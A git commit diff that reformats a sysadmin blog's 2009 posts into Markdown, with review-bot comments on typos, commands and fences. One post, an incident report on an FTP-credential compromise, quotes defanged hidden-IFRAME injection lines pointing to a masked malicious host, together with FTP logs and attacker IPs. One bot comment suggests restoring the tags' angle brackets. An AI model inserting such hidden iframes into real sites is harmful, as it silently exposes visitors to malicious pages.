
fix formatting for 2009(sept-dec) posts

gerold committed Jul 3, 2012
1 parent fc3361c commit 740d96baab2795703cb5be30e0bfdac5ba03547c
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: marius-ducea
date: '2009-09-01 05:03:36'
layout: post
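Review bot: the added `comments: true` front-matter key turns on a feature for this post rather than fixing its formatting, which is what the commit message says this change is about; either mention it in the message or split it into its own commit so the behaviour change is easy to find later.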
@@ -15,22 +15,27 @@ categories:
The whole hidden IFRAME vulnerability has been going on for some time, only a few of our client have been effected by this. The net is still buzzing with this issue and while some are saying that the injection are results of php insecurities, mysql injection or cross site scripting, while others point to key loggers and hijacked ftp credentials. In our case the exploit was not due to an application vulnerability but rather to hijacked ftp login information. Brute force password guessing attacks were not performed on this account nor any other accounts on the same server. In this particular type of attack, at the very end of index.php/index.html an IFRAME statement was appended overwriting page closing tags.
-`iframe src="http://***.ru:8080/index.php" width=111 height=162 style="visibi
+```
+iframe src="http://***.ru:8080/index.php" width=111 height=162 style="visibi
iframe src="http://***.ru:8080/index.php" width=136 height=162 style="visibility: hidden" /iframe
-iframe src="http://***.ru:8080/index.php" width=141 height=156 style="visibility: hidden" /iframe`
+iframe src="http://***.ru:8080/index.php" width=141 height=156 style="visibility: hidden" /iframe
+```
Some of the index.php files had multiple IFRAME statements appended to the end. Knowing the username of affected account and affected filename I searched in /var/log/messages for any related entries and hit jackpot:
-`Aug 27 01:27:59 web152 pure-ftpd: (?@94.218.69.243) [INFO] user is now logged in
+```
+Aug 27 01:27:59 web152 pure-ftpd: (?@94.218.69.243) [INFO] user is now logged in
Aug 27 01:28:00 web152 pure-ftpd: (user@94.218.69.243) [NOTICE] /home/user//public_html/index.php downloaded (2311 bytes, 1001.70KB/sec)
Aug 27 01:28:00 web152 pure-ftpd: (user@94.218.69.243) [INFO] Logout.
Aug 27 01:28:04 web152 pure-ftpd: (?@78.92.144.185) [INFO] user is now logged in
Aug 27 01:28:05 web152 pure-ftpd: (user@78.92.144.185) [NOTICE] /home/user//public_html/index.php uploaded (2353 bytes, 10.42KB/sec)
-Aug 27 01:28:05 web152 pure-ftpd: (user@78.92.144.185) [INFO] Logout.`
+Aug 27 01:28:05 web152 pure-ftpd: (user@78.92.144.185) [INFO] Logout.
+```
What's interesting to note here is that even though downloading/uploading of index.php happens within a 6 second window, the source ip address for download and upload are not the same. During the next few days the same file is downloaded and uploaded but never from the same set of ip addresses. During the few days that I was allowing this to happen as I was monitoring said activity and collecting the IP addresses to see if a pattern emerges:
-`83.82.57.39 GeoIP Country Edition: NL, Netherlands
+```
+83.82.57.39 GeoIP Country Edition: NL, Netherlands
95.52.163.74 GeoIP Country Edition: RU, Russian Federation
189.122.164.40 GeoIP Country Edition: BR, Brazil
69.159.47.21 GeoIP Country Edition: CA, Canada
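Review bot: the first injected-IFRAME line (`iframe src="http://***.ru:8080/index.php" width=111 height=162 style="visibi`) is carried into the new fence still cut off at `visibi`, and all three lines lack the `<` and `>` that made them tags, so the fenced block no longer shows what was actually appended to index.php. If the truncation and the stripped brackets were an earlier HTML-escaping accident, this is the place to fix them: the other two lines show the intended ending `style="visibility: hidden" /iframe`, and inside a ``` fence the angle brackets need no escaping. The new fences also carry no info string; `html` for the markup and `text` for the pure-ftpd log lines would make the intent explicit and give highlighting.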
@@ -42,7 +47,8 @@ What's interesting to note here is that even though downloading/uploading of ind
190.198.3.27 GeoIP Country Edition: VE, Venezuela
75.208.130.92 GeoIP Country Edition: US, United States
68.84.202.157 GeoIP Country Edition: US, United States
-75.80.81.104 GeoIP Country Edition: US, United States`
+75.80.81.104 GeoIP Country Edition: US, United States
+```
Seeing that no clear pattern is evident here and considering that the IP address was different for each connection it is my rationale that the computer's at these IP addresses were a part of a botnet. My assumption is that a developer had saved the account password and was infected by malicious software which was able to gather the ftp credentials.
@@ -16,6 +16,6 @@ So a sys admin, an architect and a project manager walk into a bar... so I wish
The project manager was asking the system admin to explain what is more important and what brings more performance improvement - server memory or faster CPU.  The system admin was doing a great job providing a technical explanation when unexpectedly the architect stepped in and provided a beatiful explanation.
-"In terms of server performance, the CPU is like the stove, and memor is like the having more pots.  Both can increase performance in a unique way. "
+*In terms of server performance, the CPU is like the stove, and memor is like the having more pots.  Both can increase performance in a unique way.*
Think about it.  Is there a better analogy out there?
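Review bot: the rewritten line `*In terms of server performance, the CPU is like the stove, and memor is like the having more pots.*` keeps two typos from the original (`memor` for `memory`, `the having` for `having`); since the line is being rewritten anyway, fix them here, and `beatiful` in the context line above could go in the same pass.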
@@ -14,8 +14,6 @@ categories:
While we are very busy administering servers, looking at cloud computing developments and improving drupal performance, we sometimes get some time to take a break and catch up on the news.   Well, this isnt exactly news, as its been out since spring 2009, but you will need some time to watch this[ video on google wave](http://wave.google.com/help/wave/about.html#video).
-
-
This is definitely a game changer.  The folks who are behind this are the brothers who brought us google earth.
So while this does not have much to do with linux servers, it is open source, and it does run on Java.   There is tons of info about this product - I would urge you to also check out this good wiki article on[ google wave](http://en.wikipedia.org/wiki/Google_Wave).
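Review bot: the link text in the context lines `[ video on google wave](http://wave.google.com/help/wave/about.html#video)` and `[ google wave](http://en.wikipedia.org/wiki/Google_Wave)` has a leading space inside the brackets, which renders as a doubled space with the underline starting at a gap; moving the space outside the bracket is squarely in scope for a formatting commit. `isnt` and `its` in the same sentence could be fixed at the same time.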
@@ -15,48 +15,53 @@ categories:
A time comes when it makes more business sense to outsource DNS. While one can use a domain registrars to manage and host dns they do not always offer best performance or even offer SLA's. We will compare a couple of companies that specialize at DNS hosting only.
[DynDNS](http://www.dyndns.com/)
-- comprehensive services offerings
-- no downtimes since inception (2001)
-- worldwide DNS cluster
-- multiplatform dynamic update clients with excellent documentation
-- 29.95 per zone per year
-- web interface
-- SLA offerings options
-- Bind based architecture
+
+* comprehensive services offerings
+* no downtimes since inception (2001)
+* worldwide DNS cluster
+* multiplatform dynamic update clients with excellent documentation
+* 29.95 per zone per year
+* web interface
+* SLA offerings options
+* Bind based architecture
[easyDNS](http://www.easydns.com/)
-- unknown reliability
-- worldwide DNS cluster
-- multiplatform dynamic update clients
-- priced at $19.99 per zone per year
-- web interface
-- no SLA offering
-- Bind based architecture
+
+* unknown reliability
+* worldwide DNS cluster
+* multiplatform dynamic update clients
+* priced at $19.99 per zone per year
+* web interface
+* no SLA offering
+* Bind based architecture
[Nettica](http://www.nettica.com/)
-- unknown reliability
-- mostly US based DNS cluster (1 location in UK)
-- priced at $10 per zone per year
-- 100$ SLA offering
-- no linux update client, however dynamic ip updates can be done with curl call to their website
-- web interface
-- windows only API's
+
+* unknown reliability
+* mostly US based DNS cluster (1 location in UK)
+* priced at $10 per zone per year
+* 100$ SLA offering
+* no linux update client, however dynamic ip updates can be done with curl call to their website
+* web interface
+* windows only API's
[Zoneedit](http://zoneedit.com/)
-- Pioneer of hosted DNS
-- Bad recent reliability
-- Bind based architecture
-- mostly US based DNS cluster (1 location in Germany)
-- multiplatform dynamic update clients
-- wide range of dynamic update clients (java, python, perl, direct calls to their website with wget), clients hosted on sourceforge with limited documentation
-- host 5 domains for free, limited to 200meg query limit per domain(approx 1 million queries), additional options cost "zone credits @ $10.95 each" for services like additional domains, load balancing, monitoring, additional queries.
+
+* Pioneer of hosted DNS
+* Bad recent reliability
+* Bind based architecture
+* mostly US based DNS cluster (1 location in Germany)
+* multiplatform dynamic update clients
+* wide range of dynamic update clients (java, python, perl, direct calls to their website with wget), clients hosted on sourceforge with limited documentation
+* host 5 domains for free, limited to 200meg query limit per domain(approx 1 million queries), additional options cost "zone credits @ $10.95 each" for services like additional domains, load balancing, monitoring, additional queries.
[UltraDNS](http://www.ultradns.com)
-- Very comprehensive list of offerings
-- 15 worldwide nodes on 5 continents
-- Protection against DNS based DDOS
-- cross platform XML based API
-- web portal
-- 100% uptime SLA
-- directory based architecture, using Oracle database replication technology. Not based on BIND
-- $15 per month for 1 domain with 5 records and 5000 queries, overage costs are $1 per 1000 queries and 0.50 cents for per additional record.
+
+* Very comprehensive list of offerings
+* 15 worldwide nodes on 5 continents
+* Protection against DNS based DDOS
+* cross platform XML based API
+* web portal
+* 100% uptime SLA
+* directory based architecture, using Oracle database replication technology. Not based on BIND
+* $15 per month for 1 domain with 5 records and 5000 queries, overage costs are $1 per 1000 queries and 0.50 cents for per additional record.
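Review bot: the rewritten bullet lines keep inconsistent price and name formatting: `* 29.95 per zone per year` has no currency sign while the other providers use `$19.99` and `$10`, `* 100$ SLA offering` puts the sign after the number, and `Bind based architecture` appears alongside `Not based on BIND`. Since every list line in this hunk is touched, normalise to `$29.95`, `$100` and `BIND` here rather than in a later pass. The `-` to `*` marker swap itself is cosmetic; the blank line inserted after each provider link is the part that changes how the list attaches to the line above it, and that is worth a word in the commit message.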
@@ -20,21 +20,28 @@ tags:
Latest version of **PHP** available for RHEL5.x is 5.1.6 and no new RedHat releases are coming as packaging has ceased. You can get PHP 5.3 for RHEL5 from [Remi](http://blog.famillecollet.com/pages/Config-en), but it it's incompatible with latest versions of Drupal, Civicrm or many modules so we need the a 5.2X branch of PHP. This requires building php from source or using rpmbuild and source rpm. I was able to use [Koji's](http://kojipkgs.fedoraproject.org/packages/php/5.2.9/1.fc9/src/php-5.2.9-1.fc9.src.rpm) FC9 php5.2.9 src.rpm to rebuild for RHEL5 and here is how.
-
Install rpm-build package.
-`sudo yum install rpm-build`
+```
+sudo yum install rpm-build
+```
Create build env in your home directory (mine is called 'max'), do NOT build as root user. I used 'rpm' directory as the build location.
-`mkdir -p rpm/{SOURCES,SRPMS,SPECS,BUILD,RPMS}`
+```
+mkdir -p rpm/{SOURCES,SRPMS,SPECS,BUILD,RPMS}
+```
Create .rpmmacros file which will identify the build location.
-`echo "%_topdir /home/max/rpm" > .rpmmacros`
+```
+echo "%_topdir /home/max/rpm" > .rpmmacros
+```
Download php5.2.9 rpm source file, i used FC9 version as it is closest to RHEL5.
-`wget http://kojipkgs.fedoraproject.org/packages/php/5.2.9/1.fc9/src/php-5.2.9-1.fc9.src.rpm`
+```
+wget http://kojipkgs.fedoraproject.org/packages/php/5.2.9/1.fc9/src/php-5.2.9-1.fc9.src.rpm
+```
To rebuild php5.2.9 FC9 source RPM for RHEL5.x into binary RPM's we need to make sure build dependences have been satisfied. I created a file called "php-deps" which contains the build dependencies to be installed via YUM.
-`
+```
bzip2-devel
curl-devel
db4-devel
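Review bot: the fence opened at the `+```` replacing the bare backtick carries no info string, and neither do the `sudo yum install rpm-build`, `mkdir -p rpm/{...}`, `echo "%_topdir ..."` and `wget ...` fences above it; tag the command blocks `bash` and the dependency list `text` so a reader can tell commands from data at a glance. The context line `but it it's incompatible with latest versions of Drupal` and `we need the a 5.2X branch` have doubled words a formatting pass should pick up too. One caveat worth a sentence in the post: `echo "%_topdir /home/max/rpm" > .rpmmacros` overwrites any existing `~/.rpmmacros`; `>>` is the safer choice if the file may already exist.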
@@ -64,47 +71,60 @@ mhash-devel
ncurses-devel
libXpm-devel
libjpeg-devel
-`
+```
Install build dependencies via yum
-`sudo yum install -y `cat php-deps``
+```
+sudo yum install -y `cat php-deps`
+```
Finally perform the build, this could take some time depending on speed of your machine. If everything goes well many php*.rpm files will be created in rpm/RPMS/"arch-type"/ folder. "arch-type" is the hardware-platform of your machine which will match "uname -i" command (mine is i386)
-`rpmbuild --rebuild php-5.2.9-1.fc9.src.rpm`
+```
+rpmbuild --rebuild php-5.2.9-1.fc9.src.rpm
+```
-Now you can install the resulting RPM's manually but a better way is to create a local YUM repository.
-Install createrepo application via YUM.
-`sudo yum info createrepo`
+Now you can install the resulting RPM's manually but a better way is to create a local YUM repository. Install createrepo application via YUM.
+```
+sudo yum info createrepo
+```
Create a repository location directory and copy your newly generated php5.2.9 RPM files into it.
-`sudo mkdir /opt/local-repository && cp /home/max/rpm/RPMS/i386/* /opt/local-repository`
+```
+sudo mkdir /opt/local-repository && cp /home/max/rpm/RPMS/i386/* /opt/local-repository
+```
Initialize the local repository and catalog the files copied there. (run this command anytime you add/remove files from your local repository directory)
-`sudo createrepo /opt/local-repository/`
+```
+sudo createrepo /opt/local-repository/
+```
Configure your local repository with yum by creating a file in /etc/yum.repos.d called "local-repository.repo"
containing:
-`[local-repository]
+```
+[local-repository]
name=RHEL5 $releasever - Local Repo
baseurl=file:///opt/local-repository/
enabled=0
gpgcheck=0
#gpgkey=file:///path/to/you/RPM-GPG-KEY
-`
+```
Update yum to register local repository
-`sudo yum update`
+```
+sudo yum update
+```
Update php using your new rpm files via the local repository
-`sudo yum --enablerepo=local-repository update php`
+```
+sudo yum --enablerepo=local-repository update php
+```
Restart apache
-`sudo /etc/init.d/httpd restart`
+```
+sudo /etc/init.d/httpd restart
+```
Verify PHP version
-`php -v`
-
-
-
-
-
+```
+php -v
+```
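Review bot: `sudo yum info createrepo` under `Install createrepo application via YUM` only prints package metadata and installs nothing; since the line is rewritten in this hunk it should become `sudo yum install createrepo`, otherwise the later `sudo createrepo /opt/local-repository/` fails with command not found. Two more in the same hunk: `sudo mkdir /opt/local-repository && cp /home/max/rpm/RPMS/i386/* /opt/local-repository` runs `cp` without `sudo`, so where `/opt` is root-owned the directory is created but the copy is denied (use `sudo cp`, or `sudo mkdir ... && sudo cp ...`); and `sudo yum update` under `Update yum to register local repository` would upgrade every installed package, whereas yum picks up the new `.repo` file on its next run anyway and `sudo yum makecache` is the command that refreshes repository metadata without changing anything. `gpgcheck=0` is acceptable for a `file://` repository of RPMs you built yourself, but the commented `#gpgkey=` line is the reminder that signing the local packages and enabling the check would close that gap.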
@@ -22,15 +22,13 @@ Ok, we will start with this new section on our blog, the "SysAdmin Tool of the W
For our Sysadmin Tool of the Week it is [**Update Scout**](http://www.update-scout.com). This site notifies you for updates or new version of software. It contain hundreds (and increasing) of applications - linux, windows, mac, website apps and tools. Like in my case I monitor Wordpress, Drupal, Apache, MySQL, KeePass, Nagios and many other, so it's very helpful to just wait for an email to arrive rather than thinking about them, checking manually, or sign up to each of them.
**Get Started:**
-- signup: just add your email and password
-- select applications you want to monitor for updates
-- add your own application if it's not on the list
+* signup: just add your email and password
+* select applications you want to monitor for updates
+* add your own application if it's not on the list
**Site Features:**
-- Latest Updates, Latest Additions, Most Popular and Most Active sections
-- Browse list of monitored applications from A-Z or using tags
-- MyUpdate-Scout for list of your monitored applications
-
+* Latest Updates, Latest Additions, Most Popular and Most Active sections
+* Browse list of monitored applications from A-Z or using tags
+* MyUpdate-Scout for list of your monitored applications
Do you have similar or better tool than this? :)
-
@@ -14,8 +14,6 @@ categories:
See the [www.whitehouse.org](http://www.whitehouse.org) story at [TechPresident.com](http://techpresident.com/blog-entry/whitehousegov-goes-drupal), here is the excerpt:
-
> [WhiteHouse.gov](http://www.whitehouse.gov/) has gone Drupal. After months of planning, says an Obama Administration source, the White House has ditched the proprietary content management system that had been in place since the days of the Bush Administration in favor of the latest version of [the open-source Drupal software](http://drupal.org/), as the [AP](http://news.yahoo.com/s/ap/20091024/ap_on_go_pr_wh/us_obama_web_site_1) alluded to in its reporting several minutes ago.
-
![](http://techpresident.com/files/img_whitehouse_drupal.gif)
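Review bot: the context line `See the [www.whitehouse.org](http://www.whitehouse.org) story` links to whitehouse.org, while the excerpt that follows is about `[WhiteHouse.gov](http://www.whitehouse.gov/)`; the link text and URL should be the .gov site the story describes. It is an unchanged line here, but a formatting commit on this file is the natural place to catch it.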
@@ -19,9 +19,9 @@ Amazon announced a couple of cool new things this morning. Standard and High CPU
Also Amazon entered it's [Relational Database Service](http://aws.amazon.com/rds/) into public beta. This new service makes it easy to set up, operate, and scale MySQL relational databases in the cloud via simple API calls.
- * Simple to Deploy - Quickly create a new production-ready relational database with a simple API call.
- * Managed - Amazon RDS handles generic, time-consuming database management tasks, such as patch management and backup.
- * Compatible - All of your existing MySQL database tools, applications, and drivers will still work.
- * Scalable - With a simple API call you can scale the compute and storage resources available to your database to meet your business needs and application load.
- * Reliable - Amazon RDS runs on the same highly reliable infrastructure used by other Amazon Web Services. Amazon RDS also gives you additional peace of mind by providing an automated database backup facility.
- * Inexpensive - You pay very low rates and only for the resources you actually consume. There are no long-term contracts or up-front commitments to use Amazon RDS.
+* Simple to Deploy - Quickly create a new production-ready relational database with a simple API call.
+* Managed - Amazon RDS handles generic, time-consuming database management tasks, such as patch management and backup.
+* Compatible - All of your existing MySQL database tools, applications, and drivers will still work.
+* Scalable - With a simple API call you can scale the compute and storage resources available to your database to meet your business needs and application load.
+* Reliable - Amazon RDS runs on the same highly reliable infrastructure used by other Amazon Web Services. Amazon RDS also gives you additional peace of mind by providing an automated database backup facility.
+* Inexpensive - You pay very low rates and only for the resources you actually consume. There are no long-term contracts or up-front commitments to use Amazon RDS.
@@ -18,38 +18,36 @@ tags:
---
Lately, we installed additional memory on our Debian (lenny) servers and installed 'bigmem' kernel for our 32-bit systems to recognize more than 3GB of ram. Bigmem kernel installations went fine on servers with Grub as their boot loader - most of them uses Grub. But on one machine with Lilo as boot loader, it didn't boot on bigmem kernel and below was the entry on _/etc/lilo.conf_.
+```
+# Boot up Linux by default.
+default=Linux
-`# Boot up Linux by default.
-default=Linux`
-
-`image=/vmlinuz
+image=/vmlinuz
label=Linux
read-only
# restricted
# alias=1
- initrd=/initrd.img`
+ initrd=/initrd.img
-`image=/vmlinuz.old
+image=/vmlinuz.old
label=LinuxOLD
read-only
optional
# restricted
# alias=2
- initrd=/initrd.img.old`
-
+ initrd=/initrd.img.old
+```
From this config I don't see the details of which kernel is the old one and the bigmem. I also tried to set the default to kernel with "LinuxOLD" label but it points to the same kernel (not the bigmem). I solved my problem by modifying the _/etc/lilo.conf_ config as follows:
-
-`# image=/vmlinuz
+```
+# image=/vmlinuz
**image=/boot/vmlinuz-2.6.26-2-686-bigmem
initrd=/boot/initrd.img-2.6.26-2-686-bigmem**
label=Linux
read-only
# restricted
# alias=1
#initrd=/initrd.img
-`
-
-**NOTE**: Don't forget to test first your changes on the _/etc/lilo.conf_ by running _'lilo'_ command - this will verify your changes.
-
+```
+**NOTE**: Don't forget to test first your changes on the `/etc/lilo.conf` by running `lilo` command - this will verify your changes.
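Review bot: the `**` emphasis markers on `**image=/boot/vmlinuz-2.6.26-2-686-bigmem` and `initrd=/boot/initrd.img-2.6.26-2-686-bigmem**` now sit inside a ``` fence, where Markdown does not interpret them, so they render as literal asterisks and a reader who copies the block gets an invalid lilo.conf; drop the markers and say in the prose which two lines changed. The inconsistent leading whitespace on the `initrd=` lines (indented in the first block, `#initrd=/initrd.img` flush-left in the second) is likewise shown verbatim inside the fence now, so it is worth aligning while these lines are being touched.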